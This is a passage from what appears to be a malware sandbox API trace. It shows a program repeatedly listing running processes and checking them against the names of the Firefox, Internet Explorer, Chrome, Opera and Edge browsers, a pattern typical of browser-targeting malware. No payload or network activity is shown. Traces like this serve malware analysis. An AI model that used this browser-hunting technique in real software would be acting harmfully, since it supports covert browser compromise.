lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0222.219] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0222.219] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0222.219] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0222.219] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.219] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0222.220] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0222.220] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0222.220] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0222.220] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0222.220] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.220] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0222.220] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0222.220] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0222.220] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0222.221] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0222.221] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.221] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0222.221] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0222.221] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0222.221] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0222.221] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0222.221] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.221] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0222.222] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0222.222] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0222.222] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0222.222] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0222.222] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.222] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0222.222] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0222.222] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0222.222] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0222.222] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0222.222] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.222] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0222.223] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0222.223] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0222.223] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0222.223] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0222.223] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.223] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0222.223] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0222.223] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0222.224] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0222.224] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0222.224] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.224] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0222.224] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0222.224] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0222.224] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0222.224] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0222.224] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.224] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0222.225] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0222.225] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0222.225] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0222.225] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0222.225] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.225] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0222.225] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0222.225] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0222.225] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0222.225] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0222.225] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.225] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0222.226] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0222.226] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0222.226] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0222.226] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0222.226] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.226] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0222.226] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0222.226] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0222.226] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0222.226] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0222.227] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.227] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0222.227] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0222.227] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0222.227] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0222.227] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0222.227] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.227] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0222.228] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0222.228] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0222.228] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0222.228] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0222.228] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.228] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0222.228] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0222.228] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0222.228] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0222.228] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0222.228] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.228] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.229] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0222.229] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0222.229] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0222.229] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0222.229] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.229] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.229] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.229] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.230] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.230] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0222.230] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.230] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0222.230] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0222.230] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0222.230] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0222.230] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0222.230] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.230] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.231] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.231] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.231] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.231] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0222.231] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.231] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.231] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0222.231] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0222.231] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0222.231] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0222.231] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.231] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.232] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0222.232] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0222.232] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0222.232] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0222.232] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.232] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0222.233] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0222.233] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0222.233] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0222.233] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0222.233] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.233] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.233] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0222.233] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0222.233] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0222.233] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0222.233] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.233] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.277] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0222.277] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0222.277] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0222.278] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0222.278] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.278] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.278] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0222.278] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0222.278] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0222.278] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0222.278] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.278] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.279] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0222.279] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0222.279] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0222.279] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0222.279] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.279] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.279] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0222.279] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0222.279] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0222.279] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0222.279] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.279] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0222.280] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0222.280] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0222.280] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0222.280] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0222.280] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0222.280] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0222.280] CloseHandle (hObject=0xe8) returned 1 [0222.280] Sleep (dwMilliseconds=0x3e8) [0223.302] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0223.304] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.305] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0223.305] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0223.305] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0223.305] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0223.305] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0223.305] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.305] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0223.305] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0223.305] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0223.305] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0223.305] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0223.305] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.306] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0223.306] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0223.306] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0223.306] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0223.306] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.306] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.306] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0223.306] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0223.306] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0223.306] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0223.306] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.306] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.307] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0223.307] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0223.307] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0223.307] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0223.307] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.307] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.308] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0223.308] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0223.308] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0223.308] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0223.308] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.308] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.308] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0223.308] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0223.308] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0223.308] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0223.308] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0223.308] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.309] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0223.309] 